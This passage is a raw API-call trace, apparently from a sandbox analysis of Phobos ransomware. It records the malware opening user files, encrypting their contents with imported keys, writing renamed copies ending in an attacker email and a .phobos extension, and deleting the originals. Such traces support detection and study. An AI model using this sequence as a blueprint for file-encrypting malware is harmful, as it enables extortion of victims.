liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.556] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.557] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0205.557] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.557] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x3a1, lpOverlapped=0x0) returned 1 [0205.663] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3b0, dwBufLen=0x3b0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3b0) returned 1 [0205.663] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x3b0, lpOverlapped=0x0) returned 1 [0205.664] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0205.664] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.664] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0205.664] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.664] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0205.664] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.664] CloseHandle (hObject=0x178) returned 1 [0205.664] CloseHandle (hObject=0x124) returned 1 [0205.664] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk")) returned 1 [0205.665] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.665] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.668] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=363) returned 1 [0205.668] CloseHandle (hObject=0x178) returned 1 [0205.668] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk")) returned 0x20 [0205.669] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.669] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.669] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.670] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0205.670] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.670] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x16b, lpOverlapped=0x0) returned 1 [0205.670] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x170, dwBufLen=0x170 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x170) returned 1 [0205.670] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x170, lpOverlapped=0x0) returned 1 [0205.671] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0205.671] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.671] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0205.671] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.671] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0205.671] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.671] CloseHandle (hObject=0x178) returned 1 [0205.671] CloseHandle (hObject=0xfc) returned 1 [0205.671] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk")) returned 1 [0205.672] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.672] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.673] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.673] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.673] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=65536) returned 1 [0205.673] CloseHandle (hObject=0xfc) returned 1 [0205.673] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf")) returned 0x26 [0205.673] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.673] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.674] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.674] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=524288) returned 1 [0205.674] CloseHandle (hObject=0xfc) returned 1 [0205.674] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms")) returned 0x26 [0205.674] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.675] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.675] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=524288) returned 1 [0205.675] CloseHandle (hObject=0xfc) returned 1 [0205.675] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms")) returned 0x26 [0205.675] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.676] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.676] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=248) returned 1 [0205.676] CloseHandle (hObject=0xfc) returned 1 [0205.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms")) returned 0x23 [0205.676] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms", dwFileAttributes=0x22) returned 1 [0205.677] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.677] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.677] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.677] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.677] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.677] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0205.677] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.677] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xf8, lpOverlapped=0x0) returned 1 [0205.678] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100, dwBufLen=0x100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100) returned 1 [0205.678] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x100, lpOverlapped=0x0) returned 1 [0205.679] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0205.679] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.679] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0205.679] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.679] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0205.679] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.679] CloseHandle (hObject=0xfc) returned 1 [0205.679] CloseHandle (hObject=0x178) returned 1 [0205.680] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms")) returned 1 [0205.680] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos", dwFileAttributes=0x23) returned 1 [0205.680] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.681] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.681] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=248) returned 1 [0205.681] CloseHandle (hObject=0x178) returned 1 [0205.681] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms")) returned 0x23 [0205.681] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms", dwFileAttributes=0x22) returned 1 [0205.682] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.682] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.682] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.683] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0205.683] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.683] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xf8, lpOverlapped=0x0) returned 1 [0205.683] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100, dwBufLen=0x100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100) returned 1 [0205.684] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x100, lpOverlapped=0x0) returned 1 [0205.684] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0205.684] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.684] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0205.684] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.684] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0205.685] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.685] CloseHandle (hObject=0x178) returned 1 [0205.685] CloseHandle (hObject=0xfc) returned 1 [0205.685] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms")) returned 1 [0205.685] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos", dwFileAttributes=0x23) returned 1 [0205.686] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.686] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.687] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=53411) returned 1 [0205.687] CloseHandle (hObject=0xfc) returned 1 [0205.687] GetFileAttributesW 